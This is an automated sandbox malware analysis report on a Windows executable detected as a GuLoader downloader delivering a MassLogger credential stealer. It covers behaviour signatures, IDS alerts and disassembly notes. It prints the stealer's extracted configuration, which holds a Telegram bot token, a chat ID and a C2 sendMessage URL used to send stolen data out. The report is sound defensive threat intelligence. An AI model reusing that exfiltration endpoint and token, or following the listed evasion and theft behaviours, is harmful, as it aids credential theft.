Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
grrezORe7h.exe

Overview

General Information

Sample name:grrezORe7h.exe
renamed because original name is a hash value
Original sample name:ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f.exe
Analysis ID:1588933
MD5:fd7d65a4a49c3867970510443c8819d5
SHA1:088fa33f1e46a544ddec2d2493895abbf358b1d3
SHA256:ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • grrezORe7h.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\grrezORe7h.exe" MD5: FD7D65A4A49C3867970510443C8819D5)
    • grrezORe7h.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\grrezORe7h.exe" MD5: FD7D65A4A49C3867970510443C8819D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.NubJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:24:08.519741+010020577441Malware Command and Control Activity Detected192.168.2.449810149.154.167.220443TCP
              2025-01-11T07:24:10.283485+010020577441Malware Command and Control Activity Detected192.168.2.449822149.154.167.220443TCP
              2025-01-11T07:24:11.951960+010020577441Malware Command and Control Activity Detected192.168.2.449832149.154.167.220443TCP
              2025-01-11T07:24:13.496886+010020577441Malware Command and Control Activity Detected192.168.2.449844149.154.167.220443TCP
              2025-01-11T07:24:14.970989+010020577441Malware Command and Control Activity Detected192.168.2.449856149.154.167.220443TCP
              2025-01-11T07:24:16.640414+010020577441Malware Command and Control Activity Detected192.168.2.449868149.154.167.220443TCP
              2025-01-11T07:24:18.318060+010020577441Malware Command and Control Activity Detected192.168.2.449883149.154.167.220443TCP
              2025-01-11T07:24:19.910084+010020577441Malware Command and Control Activity Detected192.168.2.449895149.154.167.220443TCP
              2025-01-11T07:24:21.383818+010020577441Malware Command and Control Activity Detected192.168.2.449904149.154.167.220443TCP
              2025-01-11T07:24:22.944003+010020577441Malware Command and Control Activity Detected192.168.2.449917149.154.167.220443TCP
              2025-01-11T07:24:24.576918+010020577441Malware Command and Control Activity Detected192.168.2.449933149.154.167.220443TCP
              2025-01-11T07:24:26.128064+010020577441Malware Command and Control Activity Detected192.168.2.449945149.154.167.220443TCP
              2025-01-11T07:24:27.614794+010020577441Malware Command and Control Activity Detected192.168.2.449957149.154.167.220443TCP
              2025-01-11T07:24:29.303334+010020577441Malware Command and Control Activity Detected192.168.2.449969149.154.167.220443TCP
              2025-01-11T07:24:30.788758+010020577441Malware Command and Control Activity Detected192.168.2.449981149.154.167.220443TCP
              2025-01-11T07:24:32.449590+010020577441Malware Command and Control Activity Detected192.168.2.449993149.154.167.220443TCP
              2025-01-11T07:24:34.070876+010020577441Malware Command and Control Activity Detected192.168.2.450005149.154.167.220443TCP
              2025-01-11T07:24:35.664434+010020577441Malware Command and Control Activity Detected192.168.2.450017149.154.167.220443TCP
              2025-01-11T07:24:37.245878+010020577441Malware Command and Control Activity Detected192.168.2.450029149.154.167.220443TCP
              2025-01-11T07:24:38.795552+010020577441Malware Command and Control Activity Detected192.168.2.450041149.154.167.220443TCP
              2025-01-11T07:24:40.334295+010020577441Malware Command and Control Activity Detected192.168.2.450046149.154.167.220443TCP
              2025-01-11T07:24:41.908821+010020577441Malware Command and Control Activity Detected192.168.2.450048149.154.167.220443TCP
              2025-01-11T07:24:43.473412+010020577441Malware Command and Control Activity Detected192.168.2.450050149.154.167.220443TCP
              2025-01-11T07:24:45.068943+010020577441Malware Command and Control Activity Detected192.168.2.450052149.154.167.220443TCP
              2025-01-11T07:24:47.160287+010020577441Malware Command and Control Activity Detected192.168.2.450054149.154.167.220443TCP
              2025-01-11T07:24:49.080965+010020577441Malware Command and Control Activity Detected192.168.2.450056149.154.167.220443TCP
              2025-01-11T07:24:50.562922+010020577441Malware Command and Control Activity Detected192.168.2.450058149.154.167.220443TCP
              2025-01-11T07:24:52.212753+010020577441Malware Command and Control Activity Detected192.168.2.450060149.154.167.220443TCP
              2025-01-11T07:24:54.266130+010020577441Malware Command and Control Activity Detected192.168.2.450062149.154.167.220443TCP
              2025-01-11T07:24:56.121056+010020577441Malware Command and Control Activity Detected192.168.2.450064149.154.167.220443TCP
              2025-01-11T07:24:58.424476+010020577441Malware Command and Control Activity Detected192.168.2.450066149.154.167.220443TCP
              2025-01-11T07:24:59.947306+010020577441Malware Command and Control Activity Detected192.168.2.450068149.154.167.220443TCP
              2025-01-11T07:25:02.686939+010020577441Malware Command and Control Activity Detected192.168.2.450070149.154.167.220443TCP
              2025-01-11T07:25:13.005997+010020577441Malware Command and Control Activity Detected192.168.2.450072149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:24:00.060011+010028032742Potentially Bad Traffic192.168.2.449754193.122.6.16880TCP
              2025-01-11T07:24:07.638244+010028032742Potentially Bad Traffic192.168.2.449754193.122.6.16880TCP
              2025-01-11T07:24:09.388272+010028032742Potentially Bad Traffic192.168.2.449816193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:23:54.925350+010028032702Potentially Bad Traffic192.168.2.449736142.250.181.238443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:24:08.255544+010018100081Potentially Bad Traffic192.168.2.449810149.154.167.220443TCP
              2025-01-11T07:24:09.963106+010018100081Potentially Bad Traffic192.168.2.449822149.154.167.220443TCP
              2025-01-11T07:24:11.564905+010018100081Potentially Bad Traffic192.168.2.449832149.154.167.220443TCP
              2025-01-11T07:24:13.221140+010018100081Potentially Bad Traffic192.168.2.449844149.154.167.220443TCP
              2025-01-11T07:24:14.745401+010018100081Potentially Bad Traffic192.168.2.449856149.154.167.220443TCP
              2025-01-11T07:24:16.253793+010018100081Potentially Bad Traffic192.168.2.449868149.154.167.220443TCP
              2025-01-11T07:24:18.016898+010018100081Potentially Bad Traffic192.168.2.449883149.154.167.220443TCP
              2025-01-11T07:24:19.603749+010018100081Potentially Bad Traffic192.168.2.449895149.154.167.220443TCP
              2025-01-11T07:24:21.153204+010018100081Potentially Bad Traffic192.168.2.449904149.154.167.220443TCP
              2025-01-11T07:24:22.653324+010018100081Potentially Bad Traffic192.168.2.449917149.154.167.220443TCP
              2025-01-11T07:24:24.220534+010018100081Potentially Bad Traffic192.168.2.449933149.154.167.220443TCP
              2025-01-11T07:24:25.863209+010018100081Potentially Bad Traffic192.168.2.449945149.154.167.220443TCP
              2025-01-11T07:24:27.392861+010018100081Potentially Bad Traffic192.168.2.449957149.154.167.220443TCP
              2025-01-11T07:24:28.888480+010018100081Potentially Bad Traffic192.168.2.449969149.154.167.220443TCP
              2025-01-11T07:24:30.572353+010018100081Potentially Bad Traffic192.168.2.449981149.154.167.220443TCP
              2025-01-11T07:24:32.063146+010018100081Potentially Bad Traffic192.168.2.449993149.154.167.220443TCP
              2025-01-11T07:24:33.724104+010018100081Potentially Bad Traffic192.168.2.450005149.154.167.220443TCP
              2025-01-11T07:24:35.369425+010018100081Potentially Bad Traffic192.168.2.450017149.154.167.220443TCP
              2025-01-11T07:24:36.929721+010018100081Potentially Bad Traffic192.168.2.450029149.154.167.220443TCP
              2025-01-11T07:24:38.524909+010018100081Potentially Bad Traffic192.168.2.450041149.154.167.220443TCP
              2025-01-11T07:24:40.082855+010018100081Potentially Bad Traffic192.168.2.450046149.154.167.220443TCP
              2025-01-11T07:24:41.601157+010018100081Potentially Bad Traffic192.168.2.450048149.154.167.220443TCP
              2025-01-11T07:24:43.185350+010018100081Potentially Bad Traffic192.168.2.450050149.154.167.220443TCP
              2025-01-11T07:24:44.788587+010018100081Potentially Bad Traffic192.168.2.450052149.154.167.220443TCP
              2025-01-11T07:24:46.849422+010018100081Potentially Bad Traffic192.168.2.450054149.154.167.220443TCP
              2025-01-11T07:24:48.787594+010018100081Potentially Bad Traffic192.168.2.450056149.154.167.220443TCP
              2025-01-11T07:24:50.349263+010018100081Potentially Bad Traffic192.168.2.450058149.154.167.220443TCP
              2025-01-11T07:24:51.822317+010018100081Potentially Bad Traffic192.168.2.450060149.154.167.220443TCP
              2025-01-11T07:24:53.875530+010018100081Potentially Bad Traffic192.168.2.450062149.154.167.220443TCP
              2025-01-11T07:24:55.615119+010018100081Potentially Bad Traffic192.168.2.450064149.154.167.220443TCP
              2025-01-11T07:24:58.138782+010018100081Potentially Bad Traffic192.168.2.450066149.154.167.220443TCP
              2025-01-11T07:24:59.729945+010018100081Potentially Bad Traffic192.168.2.450068149.154.167.220443TCP
              2025-01-11T07:25:02.358363+010018100081Potentially Bad Traffic192.168.2.450070149.154.167.220443TCP
              2025-01-11T07:25:12.622587+010018100081Potentially Bad Traffic192.168.2.450072149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
              Source: grrezORe7h.exe.7776.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
              Source: grrezORe7h.exeReversingLabs: Detection: 55%
              Source: grrezORe7h.exeVirustotal: Detection: 68%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECD1EC CryptUnprotectData,4_2_36ECD1EC
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECD9D9 CryptUnprotectData,4_2_36ECD9D9
              Source: grrezORe7h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49765 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49810 version: TLS 1.2
              Source: grrezORe7h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECC985h4_2_36ECC638
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC1042h4_2_36EC0C28
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC0671h4_2_36EC03B0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECE198h4_2_36ECDEFA
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECEA48h4_2_36ECE79F
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC1042h4_2_36EC0F6F
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECB791h4_2_36ECB4EC
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC1042h4_2_36EC0C22
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC1042h4_2_36EC0C1C
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36EC1042h4_2_36EC0C1A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECC041h4_2_36ECBD88
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECDD40h4_2_36ECDAA2
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECEEA0h4_2_36ECEBF7
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECE5F0h4_2_36ECE352
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECB339h4_2_36ECB07F
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECF2F8h4_2_36ECF05A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECC499h4_2_36ECC1F2
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 36ECBBE9h4_2_36ECB944
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A882Dh4_2_373A8650
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A91B7h4_2_373A8650
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then push 00000000h4_2_373ABDF0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A61B8h4_2_373A5F10
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A4218h4_2_373A3F70
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A1250h4_2_373A0FA8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A6A68h4_2_373A67C0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A30B8h4_2_373A2E10
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A5908h4_2_373A5660
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A3968h4_2_373A36C0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A2808h4_2_373A2560
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A5058h4_2_373A4DB0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A6EC0h4_2_373A6C18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A16A8h4_2_373A1400
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A1F58h4_2_373A1CB0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A7770h4_2_373A74C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A3DC0h4_2_373A3B18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A6610h4_2_373A6368
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_373A7B65
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A4670h4_2_373A43C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A54B0h4_2_373A5208
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A3510h4_2_373A3268
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A5D60h4_2_373A5AB8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A23B0h4_2_373A2108
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A2C60h4_2_373A29B8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A4ACAh4_2_373A4820
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A7318h4_2_373A7070
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then jmp 373A1B00h4_2_373A1858
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4x nop then push 00000000h4_2_377DE7C8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49856 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49933 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49883 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49933 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49856 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49883 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49868 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49868 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49810 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49810 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50017 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50017 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49993 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49822 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50046 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50046 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49822 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49895 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49904 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49895 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50070 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49904 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50029 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50066 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50070 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49945 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50029 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50066 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49957 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49945 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49957 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49993 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50064 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49917 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50064 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49917 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49832 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49832 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49969 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50048 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49969 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50048 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50060 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50060 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50056 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50056 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49981 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50052 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49981 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50052 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49844 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49844 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50041 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50068 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50041 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50068 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50050 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50050 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50005 -> 149.154.167.220:443
